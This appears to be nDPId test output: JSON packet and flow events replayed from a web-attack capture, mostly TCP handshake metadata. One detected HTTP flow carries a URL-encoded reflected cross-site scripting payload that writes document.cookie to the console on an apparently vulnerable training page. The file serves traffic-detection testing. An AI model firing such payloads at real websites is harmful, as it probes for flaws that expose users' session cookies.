-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1499347035750,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347035750,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OG5AAD4GjWKsEAABwKgKMs7KAFDI6hIKAAAAAKACchCJVwAAAgQFtAQCCAoBOSpkAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1499347035750,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347035750,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzsrSHYegyOoSC6AScSAwugAAAgQFtAQCCAoD4vvbATkqZAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1499347035751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347035751,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OG9AAD4GjWmsEAABwKgKMs7KAFDI6hIL0h2HoYAQAOXPwQAAAQEICgE5KmQD4vvb"} -01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347033203,"flow_last_seen":1499347037012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347037012,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52910,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27AQ80NQUS4TAQLQVWHMAGXB11KUBK34NZA8RUUD143IFKQDS3P5%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347038276,"flow_last_seen":1499347038276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347038276,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52964,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1499347038276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347038276,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83pNAAD4G5zysEAABwKgKMs7kAFBDY\/JIAAAAAKACchAsDwAAAgQFtAQCCAoBOSzbAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":630,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1499347038276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347038276,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzuS5pPWWQ2PySaAScSB7fQAAAgQFtAQCCAoD4v5SATks2wEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":631,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1499347038277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347038277,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03pRAAD4G50OsEAABwKgKMs7kAFBDY\/JJuaT1l4AQAOUahAAAAQEICgE5LNwD4v5S"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347039587,"flow_last_seen":1499347039587,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347039587,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52978,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1499347039587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347039587,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LfVAAD4Gl9usEAABwKgKMs7yAFDXyAPWAAAAAKACchCExgAAAgQFtAQCCAoBOS4jAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1499347039587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347039587,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzvKH9tkB18gD16AScSAhMAAAAgQFtAQCCAoD4v+aATkuIwEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1499347039588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347039588,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LfZAAD4Gl+KsEAABwKgKMs7yAFDXyAPXh\/bZAoAQAOXANwAAAQEICgE5LiMD4v+a"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347042150,"flow_last_seen":1499347042150,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347042150,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53004,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1499347042150,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347042150,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8q1JAAD4GGn6sEAABwKgKMs8MAFB23Zv2AAAAAKACchBK9gAAAgQFtAQCCAoBOTCkAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":660,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1499347042150,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347042150,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzwwb3aSHdt2b96AScSCFcgAAAgQFtAQCCAoD4wIbATkwpAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":661,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1499347042150,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347042150,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0q1NAAD4GGoWsEAABwKgKMs8MAFB23Zv3G92kiIAQAOUkegAAAQEICgE5MKQD4wIb"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347043416,"flow_last_seen":1499347043416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347043416,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53018,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1499347043416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347043416,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8okxAAD4GI4SsEAABwKgKMs8aAFDJVZOtAAAAAKACchD\/ewAAAgQFtAQCCAoBOTHhAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1499347043417,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347043417,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzxosqk4zyVWTrqAScSB+QwAAAgQFtAQCCAoD4wNXATkx4QEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1499347043417,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347043417,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ok1AAD4GI4usEAABwKgKMs8aAFDJVZOuLKpONIAQAOUdSwAAAQEICgE5MeED4wNX"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":683,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347044676,"flow_last_seen":1499347044676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347044676,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53032,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1499347044676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347044676,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QP5AAD4GhNKsEAABwKgKMs8oAFCcEnPlAAAAAKACchBLPwAAAgQFtAQCCAoBOTMbAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1499347044676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347044676,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzyh2l2DwnBJz5qAScSBsIQAAAgQFtAQCCAoD4wSSATkzGwEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1499347044677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347044677,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QP9AAD4GhNmsEAABwKgKMs8oAFCcEnPmdpdg8YAQAOULKAAAAQEICgE5MxwD4wSS"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":698,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347047249,"flow_last_seen":1499347047249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347047249,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53058,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":698,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1499347047249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347047249,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rOxAAD4GGOSsEAABwKgKMs9CAFBNBJlzAAAAAKACchByIQAAAgQFtAQCCAoBOTWfAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":699,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1499347047249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347047249,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz0I8cGwCTQSZdKAScSC\/lQAAAgQFtAQCCAoD4wcVATk1nwEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1499347047250,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347047250,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rO1AAD4GGOusEAABwKgKMs9CAFBNBJl0PHBsA4AQAOVenQAAAQEICgE5NZ8D4wcV"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347048548,"flow_last_seen":1499347048548,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347048548,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53072,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1499347048548,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347048548,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rW1AAD4GGGOsEAABwKgKMs9QAFDoOZuOAAAAAKACchDTfgAAAgQFtAQCCAoBOTbjAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1499347048548,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347048548,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz1DxNtWr6Dmbj6AScSABPgAAAgQFtAQCCAoD4whaATk24wEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1499347048549,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347048549,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rW5AAD4GGGqsEAABwKgKMs9QAFDoOZuP8TbVrIAQAOWgRAAAAQEICgE5NuQD4wha"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":731,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347051144,"flow_last_seen":1499347051144,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347051144,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":731,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1499347051144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347051144,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82StAAD4G7KSsEAABwKgKMs9qAFDGDOBHAAAAAKACchCuTwAAAgQFtAQCCAoBOTlsAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1499347051144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347051144,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz2oBc4vXxgzgSKAScSATHgAAAgQFtAQCCAoD4wrjATk5bAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":733,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1499347051145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347051145,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02SxAAD4G7KusEAABwKgKMs9qAFDGDOBIAXOL2IAQAOWyJAAAAQEICgE5OW0D4wrj"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347052434,"flow_last_seen":1499347052434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347052434,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53112,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1499347052434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347052434,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8athAAD4GWvisEAABwKgKMs94AFBfSFB3AAAAAKACchCjkwAAAgQFtAQCCAoBOTqvAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1499347052435,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347052435,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz3hoydAQX0hQeKAScSBbjwAAAgQFtAQCCAoD4wwmATk6rwEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1499347052435,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347052435,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0atlAAD4GWv+sEAABwKgKMs94AFBfSFB4aMnQEYAQAOX6lgAAAQEICgE5Oq8D4wwm"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347053735,"flow_last_seen":1499347053735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347053735,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53126,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1499347053735,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347053735,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TcZAAD4GeAqsEAABwKgKMs+GAFAPQXYyAAAAAKACchDMjAAAAgQFtAQCCAoBOTv0AAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1499347053736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347053736,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz4b8rqheD0F2M6AScSAXEAAAAgQFtAQCCAoD4w1rATk79AEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":757,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1499347053736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347053736,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TcdAAD4GeBGsEAABwKgKMs+GAFAPQXYz\/K6oX4AQAOW2FgAAAQEICgE5O\/UD4w1r"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347056332,"flow_last_seen":1499347056332,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347056332,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1499347056332,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347056332,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GMxAAD4GrQSsEAABwKgKMs+gAFAIRCayAAAAAKACchAgZgAAAgQFtAQCCAoBOT5+AAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":771,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1499347056333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347056333,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz6DSyc0OCEQms6AScSBtlQAAAgQFtAQCCAoD4w\/0ATk+fgEDAwc="} 